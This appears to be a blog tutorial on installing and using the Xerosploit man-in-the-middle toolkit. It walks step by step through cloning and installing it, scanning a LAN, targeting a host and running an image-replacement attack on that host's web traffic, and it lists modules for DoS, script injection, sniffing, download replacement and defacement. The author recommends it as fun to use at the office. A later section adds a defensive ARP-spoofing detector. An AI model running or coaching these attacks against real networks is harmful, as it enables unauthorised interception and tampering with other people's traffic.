Man-in-the-Middle Attack Tool (Xerosploit)

Introduction

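Xerosploit is a penetration testing toolkit whose purpose is to carry out man-in-the-middle attacks. It ships with a variety of effective attack modules, and it also allows denial-of-service attacks and port scanning.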

Installation

  • Download
    git clone https://github.com/LionSec/xerosploit.git
  • Install
    cd xerosploit && sudo python install.py
    [email protected]:~# cd xerosploit && sudo python install.py
    ┌══════════════════════════════════════════════════════════════┐
    █ █
    █ Xerosploit Installer █
    █ █
    └══════════════════════════════════════════════════════════════┘
    [++] Please choose your operating system.
    1) Ubuntu / Kali linux / Others
    2) Parrot OS
    >>> 1

Enter the number for your operating system and the installation runs automatically.
Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal.
This message indicates that the installation succeeded.

Usage

Run
xerosploit
to launch the tool.



██╗ ██╗███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║ ██╔═══██╗██║╚══██╔══╝
╚███╔╝ █████╗ ██████╔╝██║ ██║███████╗██████╔╝██║ ██║ ██║██║ ██║
██╔██╗ ██╔══╝ ██╔══██╗██║ ██║╚════██║██╔═══╝ ██║ ██║ ██║██║ ██║
██╔╝ ██╗███████╗██║ ██║╚██████╔╝███████║██║ ███████╗╚██████╔╝██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝ ╚══════╝╚═╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

[ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█ █
█ Your Network Configuration █
█ █
└═════════════════════════════════════════════════════════════════════════════┘

╒══════════════╤═══════════════════╤═══════════╤═════════╤════════════╕
│ IP Address │ MAC Address │ Gateway │ Iface │ Hostname │
╞══════════════╪═══════════════════╪═══════════╪═════════╪════════════╡
│ │ │ │ │ │
├──────────────┼───────────────────┼───────────┼─────────┼────────────┤
│ 1.1.1.11 │ 08:00:27:7B:3D:E7 │ 1.1.1.1 │ eth0 │ kali │
╘══════════════╧═══════════════════╧═══════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║ ║ XeroSploit is a penetration testing toolkit whose goal is to ║
║ Information ║ perform man in the middle attacks for testing purposes. ║
║ ║ It brings various modules that allow to realise efficient attacks. ║
║ ║ This tool is Powered by Bettercap and Nmap. ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

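If you want to carry out a man-in-the-middle attack, for example making every image on the websites the victim visits turn into one fixed picture, you can do the following.
Enter help to see the menu options.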

Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║ ║ ║
║ ║ scan : Map your network. ║
║ ║ ║
║ ║ iface : Manually set your network interface. ║
║ COMMANDS ║ ║
║ ║ gateway : Manually set your gateway. ║
║ ║ ║
║ ║ start : Skip scan and directly set your target IP address. ║
║ ║ ║
║ ║ rmlog : Delete all xerosploit logs. ║
║ ║ ║
║ ║ help : Display this help message. ║
║ ║ ║
║ ║ exit : Close Xerosploit. ║
║ ║ ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Enter scan to scan the network.

Xero ➮ scan

[++] Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔════════════╦═══════════════════╦══════════════════════════════╗
║ IP Address ║ Mac Address ║ Manufacturer ║
╠════════════╬═══════════════════╬══════════════════════════════╣
║ 1.1.1.1 ║ B8:F8:83:76:7E:E5 ║ (Tp-link Technologies) ║
║ 1.1.1.2 ║ A0:8C:FD:D1:2C:C6 ║ (Hewlett Packard) ║
║ 1.1.1.3 ║ A0:8C:FD:D2:25:B8 ║ (Hewlett Packard) ║
║ 1.1.1.5 ║ C0:CC:F8:42:DD:D5 ║ (Apple) ║
║ 1.1.1.6 ║ A0:8C:FD:D1:E1:8E ║ (Hewlett Packard) ║
║ 1.1.1.7 ║ A0:8C:FD:D5:81:DD ║ (Hewlett Packard) ║
║ 1.1.1.9 ║ C8:6F:1D:22:37:A2 ║ (Apple) ║
║ 1.1.1.10 ║ 08:00:37:A1:64:05 ║ (Fuji-xerox) ║
║ 1.1.1.12 ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology) ║
║ 1.1.1.14 ║ B0:E2:35:43:62:43 ║ (Xiaomi Communications) ║
║ 1.1.1.11 ║ 08:00:27:7B:3D:E7 ║ (This device) ║
║ 1.1.1.254 ║ ║ ║
║ ║ ║ ║
╚════════════╩═══════════════════╩══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮

The scan results are quite detailed; even some basic device information is picked up.
Next, enter the various inputs as shown below.

Xero ➮ 1.1.1.12

[++] 1.1.1.12 has been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ help

╔═════════╦══════════════════════════════════════════════════════════════════════╗
║ ║ ║
║ ║ pscan : Port Scanner ║
║ ║ ║
║ ║ dos : DoS Attack ║
║ ║ ║
║ ║ ping : Ping Request ║
║ ║ ║
║ ║ injecthtml : Inject Html code ║
║ ║ ║
║ ║ injectjs : Inject Javascript code ║
║ ║ ║
║ ║ rdownload : Replace files being downloaded ║
║ ║ ║
║ ║ sniff : Capturing information inside network packets ║
║ MODULES ║ ║
║ ║ dspoof : Redirect all the http traffic to the specified one IP ║
║ ║ ║
║ ║ yplay : Play background sound in target browser ║
║ ║ ║
║ ║ replace : Replace all web pages images with your own one ║
║ ║ ║
║ ║ driftnet : View all images requested by your targets ║
║ ║ ║
║ ║ move : Shaking Web Browser content ║
║ ║ ║
║ ║ deface : Overwrite all web pages with your HTML code ║
║ ║ ║
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ replace

┌══════════════════════════════════════════════════════════════┐
█ █
█ Image Replace █
█ █
█ Replace all web pages images with your own one █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮ /root/a.png

[++] All images will be replaced by /root/a.png

[++] Press 'Ctrl + C' to stop .

The effect looks similar to the following.

Review

It is quite fun to play with at the office; thumbs up. It has almost everything for man-in-the-middle attacks.
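
For the defending side, an added example (not part of the original post or of the Xerosploit project): it assumes the man-in-the-middle position is obtained by ARP spoofing, Bettercap's usual method, and checks a host's neighbour table against the IP/MAC pairs from the scan output above. The `ip neigh show` sample and the function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Baseline IP -> MAC pairs copied from the scan table on this page.
BASELINE = {
    "1.1.1.1": "b8:f8:83:76:7e:e5",   # gateway (Tp-link)
    "1.1.1.11": "08:00:27:7b:3d:e7",  # the host running the toolkit
    "1.1.1.12": "7c:dd:90:de:a1:34",  # the host chosen as target
}
GATEWAY = "1.1.1.1"

# Constructed `ip neigh show` output as the targeted host might see it
# while its gateway entry is being spoofed (sample data, not a capture).
SAMPLE_NEIGH = """\
1.1.1.1 dev eth0 lladdr 08:00:27:7b:3d:e7 REACHABLE
1.1.1.11 dev eth0 lladdr 08:00:27:7b:3d:e7 STALE
1.1.1.5 dev eth0 lladdr c0:cc:f8:42:dd:d5 STALE
1.1.1.254 dev eth0  FAILED
"""

LINE = re.compile(r"^(\d+\.\d+\.\d+\.\d+)\s+dev\s+\S+\s+lladdr\s+([0-9a-fA-F:]{17})\b")

def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table

def find_arp_anomalies(table, baseline, gateway):
    """Flag MAC changes against the baseline and one MAC claiming several IPs."""
    alerts = []
    for ip, mac in sorted(table.items()):
        known = baseline.get(ip)
        if known and known != mac:
            kind = "gateway-mac-changed" if ip == gateway else "mac-changed"
            alerts.append((kind, ip, known, mac))
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(("mac-shared", ",".join(sorted(ips)), None, mac))
    return alerts

if __name__ == "__main__":
    for alert in find_arp_anomalies(parse_neigh(SAMPLE_NEIGH), BASELINE, GATEWAY):
        print(alert)
```

On a live host the same check can be fed the real output of `ip neigh show`; a static ARP entry for the gateway removes the condition the first alert reports.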

Having Fun
